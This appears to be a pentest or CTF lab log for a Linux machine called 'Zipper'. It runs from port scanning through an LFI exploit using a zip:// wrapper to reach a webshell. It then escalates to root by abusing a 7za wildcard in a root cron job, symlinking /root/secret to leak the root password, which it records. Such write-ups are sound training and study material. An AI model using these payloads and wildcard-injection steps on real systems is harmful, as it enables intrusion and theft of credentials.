Zipper

🧪 Pentest Log: {{date:2025-08-02}}

🔍 Target Information

Machine Name: Zipper
IP Address: 192.168.230.229
Operating System: Linux

ip=192.168.230.229

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 80

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

💣 Exploitation

📌 Vulnerability Summary

Service / Port: 80
Vulnerability Type: LFI

🚀 Exploit Execution

🔧 Exploit Method

Manual
Public Exploit
Custom Script

Tool / Script Used:

http://192.168.230.229/index.php?file=zip://uploads/upload_1754190948.zip%23shell

🧬 Privilege Escalation

👤 Current Access

User: www-data
Groups: www-data
Shell Type: webshell

🔍 Enumeration

Crontab:

cat /etc/crontab

found /opt/backup.sh

* *     * * *   root    bash /opt/backup.sh
  
  
  
#!/bin/bash
password=`cat /root/secret`
cd /var/www/html/uploads
rm *.tmp
7za a /opt/backups/backup.zip -p$password -tzip *.zip > /opt/backups/backup.log

cat backup.log

found root password

WildCardsGoingWild

🔓 Privilege Escalation Exploit

📌 Exploit Summary

Technique Used: Scheduled Tasks
Target Binary/Service: N/A
Reference / Source: N/A

🔧 Exploit Steps

Setup

ln -s /root/secret enox.zip

touch @enox.zip

Smash to root

ssh root@$ip